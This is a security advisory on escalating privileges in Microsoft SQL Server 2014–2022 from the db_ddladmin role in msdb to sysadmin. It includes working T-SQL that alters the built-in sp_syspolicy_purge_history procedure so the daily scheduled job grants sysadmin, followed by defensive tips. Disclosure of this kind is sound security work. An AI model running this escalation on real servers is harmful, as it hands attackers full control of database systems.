Microsoft SQL Server db_ddladmin Privilege Escalation

Title: SQL Server Privilege Escalation from db_ddladmin to sysadminProduct:                   Microsoft SQL ServerAffected Version(s):       2014,2016,2017,2019,2022Tested Version(s):         2014,2016,2017,2019,2022Risk Level:                MediumAuthor of Advisory:        Emad Al-MousaOverview:Privilege Escalation is a serious security attack that attackers seek to compromise IT infrastructure and systems. attackers will either exploit vulnerabilites or misconfiguration in the system to escalate their permissions and take over the whole system.*****************************************Vulnerability Details:By design when you install SQL Server database engine a job is created called “syspolicy_purge_history” , and this job by design will run every day. This job can be weaponized for privilege escalation attack.attacker will require to compromise a database account that is added in MSDB system database and is granted db_ddladmin role.*****************************************Proof of Concept (PoC):I will create a dummy account called “toto”  (for the sake of simulation it will be SQL Authenticated account):USE [master]GOCREATE LOGIN [toto] WITH PASSWORD=N'toto', DEFAULT_DATABASE=[master], DEFAULT_LANGUAGE=[us_english], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFFGOAnd, then I will add the account as database user in system database MSDB with db_ddladmin permission:USE [msdb]GOCREATE USER [toto] FOR LOGIN [toto]GOUSE [msdb]GOALTER ROLE [db_ddladmin] ADD MEMBER [toto]GOThen, I will execute the following modification code against the procedure:USE [msdb]GOALTER  PROCEDURE [dbo].[sp_syspolicy_purge_history]ASBEGINALTER SERVER ROLE [sysadmin] ADD MEMBER [toto]ENDThe next scheduled run-time for the job syspolicy_purge_history, the account toto will be escalated to SYSADMIN role, which means he will he/she will take over the whole SQL Server database system.-***- To protect from such attacks you will need to follow these security tips:Implement in-place auditing for privilege escalation attacks [smart auditing….don’t audit everything as auditing will impose performance overhead]Implement least privilege concept in your environment, do not grant any account extra permissions that can be weaponized for security breach.Strong Identity and account management approach should be in-place, passwords policies are important to make brute force attacks challenging.patch your environments , and follow best security practices.*****************************************References:https://databasesecurityninja.wordpress.com/2024/01/07/sql-server-privilege-escalation-from-db_ddladmin-to-sysadmin/https://learn.microsoft.com/en-us/sql/relational-databases/security/authentication-access/database-level-roles?view=sql-server-ver16